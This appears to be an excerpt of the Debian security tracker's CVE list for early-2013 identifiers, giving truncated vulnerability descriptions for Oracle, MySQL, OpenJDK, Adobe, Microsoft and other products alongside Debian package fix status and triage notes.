Products CVE-2013-1549 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-1548 (Unspecified vulnerability in Oracle MySQL 5.1.63 and earlier allows ...) - mysql-5.5 (Only affects MySQL 5.1) - mysql-5.1 CVE-2013-1547 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-1546 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-1545 (Unspecified vulnerability in the Oracle HTTP Server component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-1544 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 ...) {DSA-2667-1} - mysql-5.5 5.5.31+dfsg-1 - mysql-5.1 CVE-2013-1543 (Unspecified vulnerability in the Siebel UI Framework component in ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-1542 (Unspecified vulnerability in the Oracle Containers for J2EE component ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-1541 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Finacial Services CVE-2013-1540 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-1539 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services CVE-2013-1538 (Unspecified vulnerability in the Network Layer component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2013-1537 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-1536 (Unspecified vulnerability in the Oracle Transportation Management ...) NOT-FOR-US: Oracle Supply Chain Products CVE-2013-1535 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2013-1534 (Unspecified vulnerability in the Workload Manager component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2013-1533 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle financial Services Software CVE-2013-1532 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 ...) {DSA-2667-1} - mysql-5.5 5.5.31+dfsg-1 - mysql-5.1 CVE-2013-1531 (Unspecified vulnerability in Oracle MySQL 5.1.66 and earlier and ...) - mysql-5.5 5.5.30+dfsg-1 - mysql-5.1 CVE-2013-1530 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...) NOT-FOR-US: Oracle Solaris CVE-2013-1529 (Unspecified vulnerability in the Oracle WebCenter Interaction ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-1528 (Unspecified vulnerability in the Oracle HRMS component in Oracle ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-1527 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-1526 (Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier allows ...) - mysql-5.5 5.5.30+dfsg-1 - mysql-5.1 (Only affects MySQL 5.5) CVE-2013-1525 (Unspecified vulnerability in the Oracle Retail Integration Bus ...) NOT-FOR-US: Oracle Industry Applications CVE-2013-1524 (Unspecified vulnerability in the Oracle Application Object Library ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-1523 (Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier and ...) - mysql-5.5 - mysql-5.1 (Only affects MySQL 5.5 and 5.6) CVE-2013-1522 (Unspecified vulnerability in the Oracle WebCenter Content component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-1521 (Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and ...) - mysql-5.5 5.5.30+dfsg-1 - mysql-5.1 CVE-2013-1520 (Unspecified vulnerability in the Oracle Clinical Remote Data Capture ...) NOT-FOR-US: Oracle Industry Applications CVE-2013-1519 (Unspecified vulnerability in the Application Express component in ...) NOT-FOR-US: Oracle Database Server CVE-2013-1518 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 6b27-1.12.5-1 CVE-2013-1517 (Unspecified vulnerability in the Oracle Application Object Library ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-1516 (Unspecified vulnerability in the Oracle WebCenter Capture component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-1515 (Unspecified vulnerability in the Oracle GlassFish Server component in ...) - glassfish (Only affects 3.x) CVE-2013-1514 (Unspecified vulnerability in the Oracle Containers for J2EE component ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-1513 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-1512 (Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier allows ...) - mysql-5.5 5.5.30+dfsg-1 - mysql-5.1 (Only affects MySQL 5.5) CVE-2013-1511 (Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and ...) {DSA-2667-1} - mysql-5.5 5.5.31+dfsg-1 - mysql-5.1 (Only affects MySQL 5.5 and 5.6) CVE-2013-1510 (Unspecified vulnerability in the Siebel UI Framework component in ...) NOT-FOR-US: Oracle Siebel CVE-2013-1509 (Unspecified vulnerability in the Oracle WebCenter Sites component in ...) NOT-FOR-US: Oracle Fusion CVE-2013-1508 (Unspecified vulnerability in the Oracle GlassFish Server component in ...) - glassfish (Only affects 3.x) CVE-2013-1507 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...) NOT-FOR-US: Solaris CVE-2013-1506 (Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 ...) - mysql-5.5 5.5.30+dfsg-1 - mysql-5.1 CVE-2013-1505 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle FLEXCUBE CVE-2013-1504 (Unspecified vulnerability in the Oracle WebLogic Server component in ...) NOT-FOR-US: Oracle Fusion CVE-2013-1503 (Unspecified vulnerability in the Oracle WebCenter Content component in ...) NOT-FOR-US: Oracle Fusion CVE-2013-1502 (Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.9 ...) {DSA-2667-1} - mysql-5.5 5.5.31+dfsg-1 - mysql-5.1 (Only affects MySQL 5.5 and 5.6) CVE-2013-1501 (Unspecified vulnerability in the Oracle iStore component in Oracle ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-1500 RESERVED CVE-2013-1499 (Unspecified vulnerability in Oracle Sun Solaris 11 allows local users ...) NOT-FOR-US: Solaris CVE-2013-1498 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...) NOT-FOR-US: Solaris CVE-2013-1497 (Unspecified vulnerability in the Oracle COREid Access component in ...) NOT-FOR-US: Oracle Fusion CVE-2013-1496 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...) NOT-FOR-US: Solaris CVE-2013-1495 (asr in Oracle Auto Service Request in Oracle Support Tools before ...) NOT-FOR-US: Oracle Auto Service Request CVE-2013-1494 (Unspecified vulnerability in Oracle Sun Solaris 10, when running on ...) NOT-FOR-US: Solaris CVE-2013-1493 (The color management (CMM) functionality in the 2D component in Oracle ...) - openjdk-6 6b27-1.12.4-1 - openjdk-7 7u3-2.1.7-1 CVE-2013-1492 (Buffer overflow in yaSSL, as used in MySQL 5.1.x before 5.1.68 and ...) - mysql-5.1 - mysql-5.5 5.5.30+dfsg-1 - cyassl (bug #598391) - libyassl (bug #664533) NOTE: https://blogs.oracle.com/sunsecurity/entry/cve_2013_1492_buffer_overflow CVE-2013-1491 (The Java Runtime Environment (JRE) component in Oracle Java SE 7 ...) - openjdk-6 (Specific to Oracle Java, not present in IcedTea) - openjdk-7 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected CVE-2013-1490 (Unspecified vulnerability in Oracle Java SE 7 Update 11 (JRE ...) - openjdk-6 (Not exploitable in OpenJDK6) - openjdk-7 CVE-2013-1489 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Only affects Java7) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-1488 (The Java Runtime Environment (JRE) component in Oracle Java SE 7 ...) - openjdk-7 7u21-2.3.9-1 - openjdk-6 (Only affects Java7) CVE-2013-1487 (Unspecified vulnerability in the Java Runtime Environment component in ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-1486 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u3-2.1.6-1 - openjdk-6 6b27-1.12.3-1 CVE-2013-1485 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u3-2.1.6-1 - openjdk-6 (Only affects Java7) CVE-2013-1484 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u3-2.1.6-1 - openjdk-6 (Only affects Java7) CVE-2013-1483 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-1482 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-1481 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Icedtea uses a different sound implementation than Oracle Java) - openjdk-7 (Icedtea uses a different sound implementation than Oracle Java) CVE-2013-1480 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-1479 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-1478 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-1477 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-1476 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-1475 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b27-1.12-1 - openjdk-7 7u3-2.1.6-1 CVE-2013-1474 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-1473 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-1472 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2013-1471 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Fortinet FortiMail CVE-2012-6530 (Stack-based buffer overflow in Sysax Multi Server before 5.52, when ...) NOT-FOR-US: Sysax Multi Server CVE-2012-6529 (Multiple SQL injection vulnerabilities in Marinet CMS allow remote ...) NOT-FOR-US: Marinet CMS CVE-2012-6528 (Multiple cross-site scripting (XSS) vulnerabilities in ATutor before ...) NOT-FOR-US: ATutor CVE-2012-6527 (Cross-site scripting (XSS) vulnerability in the My Calendar plugin ...) NOT-FOR-US: WordPress plugin My Calendar CVE-2012-6526 (SQL injection vulnerability in show_code.php in Vastal I-Tech ...) NOT-FOR-US: Vastal I-Tech Freelance Zone CVE-2012-6525 (SQL injection vulnerability in members.php in PHPBridges allows remote ...) NOT-FOR-US: PHPBridges CVE-2012-6524 (SQL injection vulnerability in kommentar.php in pGB 2.12 allows remote ...) NOT-FOR-US: pGB CVE-2012-6523 (Multiple cross-site scripting (XSS) vulnerabilities in w-CMS 2.01 ...) NOT-FOR-US: w-CMS 2.01 CVE-2012-6522 (Directory traversal vulnerability in the getContent function in ...) NOT-FOR-US: w-CMS 2.01 CVE-2011-5255 (Multiple cross-site scripting (XSS) vulnerabilities in admin/login in ...) NOT-FOR-US: X3 CMS CVE-2010-5287 (SQL injection vulnerability in default.php in Cornerstone Technologies ...) NOT-FOR-US: Cornerstone Technologies webConductor CVE-2013-1581 (The dissect_pft_fec_detailed function in ...) - wireshark (unimportant) NOTE: Not suitable for code injection CVE-2013-1580 (The dissect_cmstatus_tlv function in plugins/docsis/packet-cmstatus.c ...) - wireshark (unimportant) NOTE: Not suitable for code injection CVE-2013-1579 (The rtps_util_add_bitmap function in epan/dissectors/packet-rtps.c in ...) - wireshark (unimportant) NOTE: Not suitable for code injection CVE-2013-1578 (The dissect_pw_eth_heuristic function in ...) - wireshark (unimportant) NOTE: Not suitable for code injection CVE-2013-1577 (The dissect_sip_p_charging_func_addresses function in ...) - wireshark (unimportant) NOTE: Not suitable for code injection CVE-2013-1576 (The dissect_sdp_media_attribute function in ...) - wireshark (unimportant) NOTE: Not suitable for code injection CVE-2013-1575 (The dissect_r3_cmd_alarmconfigure function in ...) - wireshark (unimportant) NOTE: Not suitable for code injection CVE-2013-1574 (The dissect_bthci_eir_ad_data function in ...) - wireshark (unimportant) NOTE: Not suitable for code injection CVE-2013-1573 (The csnStreamDissector function in epan/dissectors/packet-csn1.c in ...) - wireshark (unimportant) NOTE: Not suitable for code injection CVE-2013-1572 (The dissect_oampdu_event_notification function in ...) - wireshark (unimportant) NOTE: Not suitable for code injection CVE-2013-1470 [XSS in geeklog] RESERVED NOTE: There was a RFP long time ago, bug #203818 NOTE: https://www.htbridge.com/advisory/HTB23143 NOT-FOR-US: Geeklog CVE-2013-1469 (Directory traversal vulnerability in install.php in Piwigo before ...) - piwigo NOTE: https://www.htbridge.com/advisory/HTB23144 CVE-2013-1468 (Cross-site request forgery (CSRF) vulnerability in the LocalFiles ...) - piwigo NOTE: https://www.htbridge.com/advisory/HTB23144 CVE-2013-1467 RESERVED CVE-2013-1466 RESERVED CVE-2013-1465 (The Cubecart::_basket method in classes/cubecart.class.php in CubeCart ...) NOT-FOR-US: CubeCart CVE-2013-1464 (Cross-site scripting (XSS) vulnerability in ssets/player.swf in the ...) NOT-FOR-US: WordPress plugin CVE-2013-1463 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: WordPress plugin CVE-2013-1462 (Integer signedness error in the ExecuteSoapAction function in the ...) - miniupnpd CVE-2013-1461 (The ExecuteSoapAction function in the SOAPAction handler in the HTTP ...) - miniupnpd CVE-2013-1460 RESERVED CVE-2013-1459 RESERVED CVE-2013-1458 RESERVED CVE-2013-1457 RESERVED CVE-2013-1456 RESERVED CVE-2013-1455 (Joomla! 3.0.x through 3.0.2 allows attackers to obtain sensitive ...) - joomla (bug #571794) CVE-2013-1454 (Joomla! 3.0.x through 3.0.2 allows attackers to obtain sensitive ...) - joomla (bug #571794) CVE-2013-1453 (plugins/system/highlight/highlight.php in Joomla! 3.0.x through 3.0.2 ...) - joomla (bug #571794) CVE-2013-1452 RESERVED CVE-2013-4696 REJECTED CVE-2013-1451 (Microsoft Internet Explorer 8 and 9, when the Proxy Settings ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1450 (Microsoft Internet Explorer 8 and 9, when the Proxy Settings ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1449 RESERVED CVE-2013-1448 RESERVED CVE-2013-1447 RESERVED CVE-2013-1446 RESERVED CVE-2013-1445 RESERVED CVE-2013-1444 RESERVED CVE-2013-1443 RESERVED CVE-2013-1442 RESERVED CVE-2013-1441 RESERVED CVE-2013-1440 RESERVED CVE-2013-1439 RESERVED CVE-2013-1438 RESERVED CVE-2013-1437 RESERVED CVE-2013-1436 RESERVED CVE-2013-1435 RESERVED CVE-2013-1434 RESERVED CVE-2013-1433 RESERVED CVE-2013-1432 RESERVED CVE-2013-1431 RESERVED CVE-2013-1430 RESERVED CVE-2013-1429 [Lintian unsafe symlinks] RESERVED - lintian 2.5.10.5 (bug #705553; unimportant) CVE-2013-1428 (Stack-based buffer overflow in the receive_tcppacket function in ...) {DSA-2663-1} - tinc 1.0.19-3 CVE-2013-1427 (The configuration file for the FastCGI PHP support for lighthttpd ...) {DSA-2649-1} - lighttpd 1.4.31-4 CVE-2013-1426 RESERVED CVE-2013-1425 [ldap-git-backup: Incorrect directory permissions exposes password hashes] RESERVED - ldap-git-backup 1.0.4-1 (bug #699227) CVE-2013-1424 RESERVED CVE-2013-1423 ((1) contrib/gforge-3.0-cronjobs.patch, (2) cronjobs/homedirs.php, (3) ...) {DSA-2633-1} - fusionforge 5.2.1+20130227-1 CVE-2013-1422 RESERVED CVE-2013-1421 RESERVED CVE-2013-1420 RESERVED CVE-2013-1419 RESERVED CVE-2013-1418 RESERVED CVE-2013-1417 RESERVED CVE-2013-1416 (The prep_reprocess_req function in do_tgs_req.c in the Key ...) - krb5 1.10.1+dfsg-5 (bug #704775) CVE-2013-1415 (The pkinit_check_kdc_pkid function in ...) - krb5 1.10.1+dfsg-4 (low) [squeeze] - krb5 (Minor issue) NOTE: https://github.com/krb5/krb5/commit/c773d3c775e9b2d88bcdff5f8a8ba88d7ec4e8ed NOTE: https://github.com/krb5/krb5/commit/b71f8c4aacea8849ceaf31a2fa95e143f3943097 CVE-2013-1414 RESERVED CVE-2012-6521 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: Elefant CMS CVE-2012-6520 (Multiple SQL injection vulnerabilities in the advanced search in ...) NOT-FOR-US: Wikidforum CVE-2012-6519 (SQL injection vulnerability in modules/poll/index.php in DIY-CMS 1.0 ...) NOT-FOR-US: DIY-CMS CVE-2012-6518 (Cross-site request forgery (CSRF) vulnerability in mod.php in DiY-CMS ...) NOT-FOR-US: DiY-CMS CVE-2012-6517 (Multiple cross-site scripting (XSS) vulnerabilities in DiY-CMS 1.0 ...) NOT-FOR-US: DiY-CMS CVE-2012-6516 (SQL injection vulnerability in PHP Ticket System Beta 1 allows remote ...) NOT-FOR-US: PHP Ticket System Beta CVE-2012-6515 (eFront 3.6.10, 3.6.11 build 15059, and earlier allows remote attackers ...) NOT-FOR-US: eFront CVE-2012-6514 (Cross-site scripting (XSS) vulnerability in the nBill (com_netinvoice) ...) NOT-FOR-US: nBill for Joomla! CVE-2012-6513 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: gpEasy CMS CVE-2012-6512 (The Organizer plugin 1.2.1 for WordPress allows remote attackers to ...) NOT-FOR-US: Organizer wordpress plugin not in Debian CVE-2012-6511 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Organizer wordpress plugin not in Debian CVE-2012-6510 (Multiple cross-site scripting (XSS) vulnerabilities in NetArt Media ...) NOT-FOR-US: NetArt Media Car Portal CVE-2012-6509 (Unrestricted file upload vulnerability in NetArt Media Car Portal 3.0 ...) NOT-FOR-US: NetArt Media Car Portal CVE-2012-6508 (Multiple cross-site request forgery (CSRF) vulnerabilities in NetArt ...) NOT-FOR-US: NetArt Media Car Portal CVE-2012-6507 (Multiple SQL injection vulnerabilities in admin.php in ChurchCMS 0.0.1 ...) NOT-FOR-US: ChurchCMS CVE-2012-6506 (Multiple cross-site scripting (XSS) vulnerabilities in he Zingiri Web ...) NOT-FOR-US: Zingiri Web Shop wordpress plugin not in Debian CVE-2012-6505 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: PHP Volunteer Management not in Debian CVE-2012-6504 (SQL injection vulnerability in mods/hours/data/get_hours.php in PHP ...) NOT-FOR-US: PHP Volunteer Management not in Debian CVE-2012-6503 (Unspecified vulnerability in the NinjaXplorer component before 1.0.7 ...) NOT-FOR-US: NinjaXplorer for Joomla! CVE-2012-6502 (Microsoft Internet Explorer before 10 allows remote attackers to ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1413 RESERVED CVE-2013-1412 RESERVED CVE-2013-1411 RESERVED CVE-2013-1410 RESERVED CVE-2013-1409 RESERVED CVE-2013-1408 RESERVED CVE-2013-1407 RESERVED CVE-2013-1406 (The Virtual Machine Communication Interface (VMCI) implementation in ...) NOT-FOR-US: VMware Workstation, Fusion, View, ESXi, ESX CVE-2013-1405 (VMware vCenter Server 4.0 before Update 4b and 4.1 before Update 3a, ...) NOT-FOR-US: VMware CVE-2013-1404 RESERVED CVE-2013-1403 RESERVED CVE-2013-1402 (DigiLIBE 3.4 and possibly other versions sends a redirect but does not ...) NOT-FOR-US: DigiLIBE CVE-2013-1401 RESERVED CVE-2013-1400 RESERVED CVE-2009-5134 (Buffer overflow in the "create torrent dialog" functionality in ...) NOT-FOR-US: uTorrent CVE-2013-XXXX [buffer overflow in commandline parsing] - swath 0.4.3-3 (low; bug #698189) [squeeze] - swath 0.4.0-4+squeeze1 CVE-2013-0243 [Basic constraints vulnerability] RESERVED - haskell-tls-extra 0.4.6.1-1 (bug #698545) CVE-2013-1399 RESERVED CVE-2013-1398 RESERVED CVE-2013-1397 RESERVED CVE-2013-1396 RESERVED CVE-2013-1395 RESERVED CVE-2013-1394 RESERVED CVE-2013-1393 RESERVED CVE-2013-1392 RESERVED CVE-2013-1391 RESERVED CVE-2013-1390 RESERVED CVE-2013-1389 (Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 11, ...) NOT-FOR-US: Adobe ColdFusion 9.0 CVE-2013-1388 (Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, ...) NOT-FOR-US: Adobe ColdFusion CVE-2013-1387 (Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, ...) NOT-FOR-US: Adobe ColdFusion CVE-2013-1386 (Adobe Shockwave Player before 12.0.2.122 allows attackers to execute ...) NOT-FOR-US: Adobe Shockwave Player CVE-2013-1385 (Adobe Shockwave Player before 12.0.2.122 does not prevent access to ...) NOT-FOR-US: Adobe Shockwave Player CVE-2013-1384 (Adobe Shockwave Player before 12.0.2.122 allows attackers to execute ...) NOT-FOR-US: Adobe Shockwave Player CVE-2013-1383 (Buffer overflow in Adobe Shockwave Player before 12.0.2.122 allows ...) NOT-FOR-US: Adobe Shockwave Player CVE-2013-1382 RESERVED CVE-2013-1381 RESERVED CVE-2013-1380 (Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1379 (Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1378 (Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1377 RESERVED CVE-2013-1376 RESERVED NOT-FOR-US: Adobe Reader CVE-2013-1375 (Heap-based buffer overflow in Adobe Flash Player before 10.3.183.68 ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1374 (Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1373 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1372 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1371 (Adobe Flash Player before 10.3.183.68 and 11.x before 11.6.602.180 on ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1370 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1369 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1368 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1367 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1366 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...) NOT-FOR-US: Adobe Flash Plugin CVE-2013-1365 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...) NOT-FOR-US: Adobe Flash Plugin CVE-2012-6110 [bcron file descriptors not closed] RESERVED - bcron 0.09-13 (low; bug #686650) [squeeze] - bcron 0.09-11+squeeze1 CVE-2013-1364 [possible to override LDAP configuration parameters via the API] RESERVED - zabbix 1:2.0.4+dfsg-2 (bug #698541) NOTE: patches in https://support.zabbix.com/browse/ZBX-6097 CVE-2013-1363 RESERVED CVE-2013-1362 [Allows passing of $() as command arguments and executing shell commands] RESERVED - nagios-nrpe 2.13-3 (low; bug #701227) [squeeze] - nagios-nrpe (Minor issue) CVE-2013-1361 RESERVED CVE-2013-1360 RESERVED CVE-2013-1359 RESERVED CVE-2013-1358 RESERVED CVE-2013-1357 RESERVED CVE-2013-1356 RESERVED CVE-2013-1355 RESERVED CVE-2013-1354 RESERVED CVE-2013-1353 RESERVED CVE-2013-1352 RESERVED CVE-2013-1351 RESERVED CVE-2013-1350 RESERVED CVE-2013-1349 RESERVED CVE-2013-1348 RESERVED CVE-2013-1347 (Microsoft Internet Explorer 8 does not properly handle objects in ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1346 (mpengine.dll in Microsoft Malware Protection Engine before 1.1.9506.0 ...) NOT-FOR-US: Microsoft Malware Protection Engine CVE-2013-1345 RESERVED CVE-2013-1344 RESERVED CVE-2013-1343 RESERVED CVE-2013-1342 RESERVED CVE-2013-1341 RESERVED CVE-2013-1340 RESERVED CVE-2013-1339 RESERVED CVE-2013-1338 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1337 (Microsoft .NET Framework 4.5 does not properly create policy ...) NOT-FOR-US: Microsoft .NET Framework 4.5 CVE-2013-1336 (The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP2, ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-1335 (Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to ...) NOT-FOR-US: Microsoft Word CVE-2013-1334 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...) NOT-FOR-US: Microsoft Windows CVE-2013-1333 (Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1332 (dxgkrnl.sys (aka the DirectX graphics kernel subsystem) in the ...) NOT-FOR-US: Microsoft Windows CVE-2013-1331 RESERVED CVE-2013-1330 RESERVED CVE-2013-1329 (Integer signedness error in Microsoft Publisher 2003 SP3 allows remote ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1328 (Microsoft Publisher 2003 SP3, 2007 SP3, and 2010 SP1 allows remote ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1327 (Integer signedness error in Microsoft Publisher 2003 SP3 allows remote ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1326 RESERVED CVE-2013-1325 RESERVED CVE-2013-1324 RESERVED CVE-2013-1323 (Microsoft Publisher 2003 SP3 does not properly handle NULL values for ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1322 (Microsoft Publisher 2003 SP3 does not properly check table range data, ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1321 (Microsoft Publisher 2003 SP3 does not properly check the data type of ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1320 (Buffer overflow in Microsoft Publisher 2003 SP3 allows remote ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1319 (Microsoft Publisher 2003 SP3 does not properly check the return value ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1318 (Microsoft Publisher 2003 SP3 allows remote attackers to execute ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1317 (Integer overflow in Microsoft Publisher 2003 SP3 allows remote ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1316 (Microsoft Publisher 2003 SP3 does not properly validate the size of an ...) NOT-FOR-US: Microsoft Publisher CVE-2013-1315 RESERVED CVE-2013-1314 RESERVED CVE-2013-1313 (Object Linking and Embedding (OLE) Automation in Microsoft Windows XP ...) NOT-FOR-US: Microsoft Windows XP CVE-2013-1312 (Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1311 (Use-after-free vulnerability in Microsoft Internet Explorer 8 allows ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1310 (Use-after-free vulnerability in Microsoft Internet Explorer 6 and 7 ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1309 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1308 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1307 (Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1306 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1305 (HTTP.sys in Microsoft Windows 8, Windows Server 2012, and Windows RT ...) NOT-FOR-US: Microsoft CVE-2013-1304 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) 